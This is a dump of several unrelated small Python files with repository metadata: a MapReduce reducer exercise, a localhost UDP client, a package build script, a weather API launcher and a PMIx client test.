] | permissive | AkiraKane/Python | 23df49d7f7ae0f375e0b4ccfe4e1b6a077b1a52b | 12e2dcb9a61e9ab0fc5706e4a902c48e6aeada30 | refs/heads/master | 2020-12-11T07:20:01.524438 | 2015-11-07T12:42:22 | 2015-11-07T12:42:22 | 47,440,128 | 1 | 0 | null | 2015-12-05T03:15:52 | 2015-12-05T03:15:51 | null | UTF-8 | Python | false | false | 1,139 | py | '''
-------------------------------------------------------------------------
Book: Machine Learning In Action
# Lesson: MapReduce - reducer
# Author: Kelly Chan
# Date: Feb 3 2014
-------------------------------------------------------------------------
'''
import sys
from numpy import mat, mean, power
def dataLoad(dataFile):
for line in dataFile:
yield line.rstrip()
# creating a list of lines from dataFile
data = dataLoad(sys.stdin)
# spliting data lines into separte items and storing in list of lists
mapperOut = [line.split('\t') for line in data]
# accumulating total number of samples, overall sum and overall sum squared
accumulateN = 0.0
accumulateSum = 0.0
accumulateSumSquared = 0.0
for instance in mapperOut:
thisN = float(instance[0])
accumulateN += thisN
accumulateSum += thisN * float(instance[1])
accumulateSumSquared += thisN * float(instance[2])
# calculating means
mean = accumulateSum / accumulateN
meanSq = accumulateSumSquared / accumulateN
# printing size, mean, mean squared
print "%d\t%f\t%f" % (accumulateN, mean, meanSq)
print >> sys.stderr, "report: still alive"
| [
"kwailamchan@hotmail.com"
] | kwailamchan@hotmail.com |
46cf562c95af191be94d761d7f80a726259bf3ef | cd84e26e1a03676751bea45339aff90d14671af4 | /c/net_lastsem/client1.py | 8005768ee0c48fa9722537361c0b7cd3d3ece74b | [] | no_license | Adityaypatil/my-codes | 947b8aa0a5b440f7ae3df4d4a5e426658117779c | 04f086c136e9e7f358b697ec52f8a3da1d750557 | refs/heads/master | 2021-01-01T03:54:53.886603 | 2016-04-29T11:01:07 | 2016-04-29T11:01:07 | 57,363,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | import socket
import sys
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
server_Add=("localhost",10001)
#data= 'Hello'
while(1):
data = raw_input('Enter any data :')
print 'sending data :%s' % data
sent=sock.sendto(data,server_Add)
print 'Waiting :'
data,server=sock.recvfrom(1024)
print 'Recieve data :%s' % data
print 'CLosing socket'
sock.close()
| [
"adityapatil961992@gmail.com"
] | adityapatil961992@gmail.com |
22eda2f6808270ecbce2716573ef6ba9a1323562 | 65748b3fdc3f9ebbf39625f7e62c377cd110e9ea | /TrafficCreator/ProtocolHandlers/UdpProtocol.py | 3c135833c4d9467b2b9a63573e0566aa6bbc2ffa | [] | no_license | Pflokki/GenUI | e64ace0e55c8fb2267274ae30f37965672348b38 | 576ce9e615897f0f9d630442aa477e7a4bd627da | refs/heads/master | 2022-11-04T22:15:30.820247 | 2020-06-19T21:45:10 | 2020-06-19T21:45:10 | 245,126,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | from .DefaultProtocol import DefaultProtocol
class UDPProtocol(DefaultProtocol):
def __init__(self):
super().__init__()
| [
"ukostyan@gmail.com"
] | ukostyan@gmail.com |
e1bba0f09554acc3bb4b6d06ed2b7d9e1b2ef32b | 30f15a184450d6e914ac16375e674cc2f993b9ce | /desktop/enlightenment/addon/e-module-mail/actions.py | 592c34362879b146c20631acd1af05e28314ac96 | [] | no_license | Erick-Pardus/2013 | 9d0dd48e19400965476480a8e6826beb865bdb2e | 80943b26dbb4474f6e99f81752a0d963af565234 | refs/heads/master | 2021-01-18T16:57:58.233209 | 2012-10-30T20:35:42 | 2012-10-30T20:35:42 | 6,467,098 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2011 TUBITAK/BILGEM
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import get
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
WorkDir="mail"
def setup():
autotools.autoreconf("-vfi")
shelltools.system("./autogen.sh --disable-static")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s"% get.installDIR())
pisitools.dodoc("AUTHORS","COPYING*")
| [
"erdincgultekin@gmail.com"
] | erdincgultekin@gmail.com |
e0d4da74400b07b5d1b53842cf893c82025f4ed0 | c02589ad3c0a64258bd96b711e2a158321a85208 | /run.py | 9b3e4316da35000c73e0b7be98c6de21a26eed52 | [
"MIT"
] | permissive | aatrubilin/wpapi | f06b3252b3240c27755c826b41729ad0f8bc5c1f | 6832cbf113f55737752d7ddbc1f045b8f6116f61 | refs/heads/master | 2020-07-25T13:52:13.492281 | 2019-09-16T06:02:17 | 2019-09-16T06:02:17 | 208,312,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | import os
import argparse
from wpapi.server import app
import wpapi.weather_services as services
parser = argparse.ArgumentParser()
parser.add_argument(
"-s",
"--service",
type=str,
required=True,
choices=["OpenWeatherMapAPI", "FakeWeatherAPI"],
help="Working weather api.",
)
parser.add_argument(
"-lat",
"--latitude",
type=float,
metavar="55.03",
default=55.03,
help="City geo location, latitude",
)
parser.add_argument(
"-lon",
"--longitude",
type=float,
metavar="82.92",
default=82.92,
help="City geo location, longitude",
)
parser.add_argument(
"-t",
"--timeout",
type=int,
metavar="10",
default=10,
help="Min seconds between requests to API. Default 10",
)
args = parser.parse_args()
token = os.environ.get("WEATHER_API_TOKEN", None)
api = getattr(services, args.service)(
lat=args.latitude, lon=args.longitude, token=token, timeout_sec=args.timeout
)
app.register_api(api, url_prefix=None)
app.run(host="0.0.0.0")
| [
"aatrubilin@gmail.com"
] | aatrubilin@gmail.com |
1c65963e4268e1a9119332b227a3df05764c3cb1 | cb52f3f0f0b51fec9dd27f6992b1c42ff02b43ab | /bindings/python/client.py | ae5445a18a181542d0649ea755a51739248c1c0e | [
"BSD-3-Clause-Open-MPI"
] | permissive | atongkuze/pmix | 7a8d82a6351402e1e146ff75031a2112b2b11534 | cd51ea4d28ec0d0e2de72ec5f6157a0684b0144d | refs/heads/master | 2020-05-02T19:54:26.413138 | 2019-03-28T00:01:16 | 2019-03-28T00:01:16 | 178,173,206 | 0 | 0 | NOASSERTION | 2019-03-28T09:45:11 | 2019-03-28T09:45:01 | C | UTF-8 | Python | false | false | 461 | py | #!/opt/local/bin/python
from pmix import *
def main():
foo = PMIxClient()
print("Testing PMIx ", foo.get_version())
info = {PMIX_PROGRAMMING_MODEL: 'TEST', PMIX_MODEL_LIBRARY_NAME: "PMIX"}
my_result = foo.init(info)
print("Init result ", my_result)
if 0 != my_result:
print("FAILED TO INIT")
exit(1)
# try getting something
# finalize
info = {}
foo.finalize(info)
if __name__ == '__main__':
main()
| [
"rhc@open-mpi.org"
] | rhc@open-mpi.org |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.